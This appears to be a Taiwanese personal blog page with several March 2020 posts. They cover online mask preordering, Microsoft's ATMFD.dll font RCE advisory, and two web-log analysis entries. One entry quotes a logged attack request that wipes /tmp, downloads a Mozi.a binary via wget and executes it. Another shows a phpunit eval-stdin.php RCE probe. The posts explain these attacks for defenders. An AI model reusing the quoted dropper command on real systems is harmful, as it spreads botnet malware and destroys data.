明天開始台灣口罩實名制2.0-網路預購要進行第二輪的購買, 發現手機 APP 更新後也稍作修改, 操作介面更清楚
1. 登入後首頁直接可以看到口罩預購的圖示
2. 點擊口罩預購之後, 有兩個按鈕, 一個是預購登錄, 一個是繳費查詢
2020年3月25日 星期三
2020年3月24日 星期二
微軟發布 Windows RCE遠端代碼執行漏洞 (ADV200006)
微軟於 3/23 發布2個重大遠端代碼執行漏洞 (RCE, Remote Code Execution)
這2個漏洞是在 Windows 內建的 Adobe Type Manager Library (ATMFD.dll) 元件中 (Adobe Type Manager Library 的功用是在 Windows 中顯示 Adobe Type 1 PostScript 字型), 漏洞是利用有害的字型檔案, 當用戶開啟檔案或在 Windows 內預覽字型時, 攻擊者可在Windows 上執行程式碼
影響範圍包括 Windows Server 2008、2012、2016 及 2019, 以及所有 Windows 10 版本與 Windows 7、Windows 8.1、Windows RT 8.1, 預計會在4月發布修補程式
現行微軟建議用戶關閉「檔案總管」中的預覽窗格及詳細內容窗格, 可防止檔案總管顯示 OpenType 字型, 或是關閉 WebClient 服務, 另外一種是重新命名 ATMFD.dll, 但這可能造成某些使用 OpenType 字型的應用程式無法運作, 不過 Windows 10-1709 以後的版本就沒有這個檔案了
2020年3月12日 星期四
台灣口罩實名制2.0-網路預購
今天最重要的事就是全民口罩購買上網啦, 解決那些因為上班上課無法去排隊購買口罩的人, 可以上網購買, 首先就是去安裝「全民健保行動快易通-健康存摺」這個APP到手機上
1. 開啟手機「全民健保行動快易通-健康存摺」這個APP
2. 首先首頁選擇「健康存摺」
2020年3月11日 星期三
從 Web Log 學習系統漏洞 60
web log 中出現一個白癡
我的 IP 是 127.0.0.1, 快來 !
180.123.121.41 - - [11/Mar/2020:12:31:24 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 302 297 "-" "Hello, world"
我的 IP 是 127.0.0.1, 快來 !
2020年3月4日 星期三
從 Web Log 學習系統漏洞 59
web log 中出現了這一段:
wiki 中關於 phpunit 說明:
5.101.0.209 - - [02/Mar/2020:23:31:59 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 403 259 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
稍微問了一下估狗大神後得知, 這是一種利用 phpunit 進行遠端代碼執行的漏洞, phpunit 是一種在程式開發時使用的測試工具, 能夠利用它發送 post 請求執行php, 不適合放在網站伺服器的瀏覽端, 簡單的防堵方式就是把它刪除
wiki 中關於 phpunit 說明:
PHPUnit是用於PHP編程語言的單元測試框架, 它是xUnit體系結構的一個實例, 用於單元測試框架, 該框架起源於SUnit並在JUnit中流行, PHPUnit由Sebastian Bergmann創建, 其開發託管在GitHub上